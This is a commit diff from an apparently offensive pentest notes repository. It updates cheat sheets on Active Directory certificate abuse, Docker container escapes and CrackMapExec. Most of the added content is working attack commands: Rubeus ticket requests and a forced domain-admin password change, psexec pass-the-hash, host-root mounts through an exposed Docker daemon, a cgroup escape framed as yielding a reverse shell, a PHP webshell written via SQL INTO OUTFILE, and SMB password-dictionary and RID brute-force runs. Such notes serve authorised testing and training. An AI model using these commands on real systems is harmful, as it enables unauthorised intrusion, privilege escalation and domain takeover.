whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

AD certificate and docker escapes

This commit is contained in:
whackx 2024-01-11 05:40:49 +01:00
parent 74845509af
commit bbef002f0a
3 changed files with 87 additions and 48 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
Cryptography/Active Directory/Active Directory Certificate Service.md
View File

@ -28,6 +28,14 @@ Exploitable templates should have the following traits:
* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
#### Certify
Find information about all registered CAs. For a start take a look at least at
```sh
Certify.exe find /vulnerable
```
### Certificate Creation
@ -36,18 +44,25 @@ Exploitable templates should have the following traits:
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
* An alternative is certipy-ad
An alternative is certipy-ad
#### Certipy-AD
First `pip install certipy-ad`
Take a look at the Documentation provided in the [git repositories'
README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.
### Impersonation
* Request TGT with the created cert
* Grab TGT
Request TGT with the created cert.
* On the machine via
#### On the target machine via
```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
```
* Select a domain admin via opening `Active Directory Users and Computers`
Select a domain admin via opening `Active Directory Users and Computers`
```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
```
@ -61,6 +76,13 @@ exit
dir \\<domain>\<dir>$\
```
#### On the attacking machine
Use impacket's psexec
```sh
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
```
## CVE-2022-26923
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions

71
Exploits/Containers/Docker.md
View File

@ -54,45 +54,39 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
```
## Reversing Docker Images
## Remote Docker Daemon
* [Dive](https://github.com/wagoodman/dive)
Users inside the `docker` group may open tcp socket through docker
In case you find an exposed docker daemon it can be used in the following way
```sh
dive <IMAGE-ID>
docker -H tcp://$TARGET_IP:2375 ps
docker -H tcp://$TARGET_IP:2375 images
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## RCE via Exposed Docker Daemon
* Users inside the `docker` group may open tcp socket through docker
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket
Execute commands on socket
```sh
docker -H tcp://test.com:2375 ps
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
```
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets
Look out for exposed docker sockets
```sh
find / -name "*sock" 2>/dev/null
groups
```
* Mount the host volume and chroot to it, need alpine image.
Mount the host volume and chroot to it. Ideally, use an image that is
installed already, e.g. alpine here.
```sh
docker images
@ -107,34 +101,27 @@ docker run -v /:/host --rm -it <imageID> chroot /host/ bash
## Shared Namespaces
* Namespaces
* Cgroups
* OverlayFS
* Requires root inside the container
* Execute command
Requires root inside the container
```sh
nsenter --target 1 --mount sh
nsenter --target 1 --mount --uts --ipc --net /bin/bash
```
## Misconfiguration
### capabilities
### Capabilities
* Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible
Privileged container connect to the host directly, not through the docker engine.
Execution of binaries on the host from inside the container is possible.
```sh
capsh --print
```
* `man capabilities`
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
* Exploit and get a reverse shell to the host via
Exploit and get a reverse shell to the host via
```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
@ -147,7 +134,7 @@ chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
* The file may appear outside the container on the host system
Caveat: The file may appear outside the container on some host systems. Have to investigate...
### cap_admin
@ -169,8 +156,8 @@ the docker volume, e.g.
## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device
`fdisk -l` and `lsblk`, host bulk device may be exposed
Mount the device
```sh
mkdir /mnt/hostdev
@ -218,6 +205,20 @@ Connection: Upgrade
Upgrade: tcp
```
## Reversing Docker Images
* [Dive](https://github.com/wagoodman/dive)
```sh
dive <IMAGE-ID>
```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## Escape through DB
* Login into DB
@ -226,14 +227,14 @@ Upgrade: tcp
* Select table content into a file the user can read
* Execute the file
```sql
```SQL
create table h4x0r (pwn varchar(1024));
insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
```
* curl the webshell hon the exploited host
curl the webshell hon the exploited host
```sh
curl <host-IP>/shell.php?cmd=id

32
Post Exploitation/Windows/CrackMapExec.md
View File

@ -1,23 +1,39 @@
# Crackmapexec
* Dictionary attack against SMB
```sh
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
## Dictionary attack against SMB
```sh
cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
```
* Use the password with `impacket/examples/psexec.py` in the following way
## Brute Force attack against SMB
Brute force attack using an anonymous user
```sh
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
```
## Use Found Password
Use the password with `impacket/examples/psexec.py` in the following way
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```
## Shares
## Enumerate Shares
* Check user permissions on shares
``sh
Check user permissions on shares
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
```
## SMB
* Check user hash on the network via smb
Check user hash on the network via smb
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```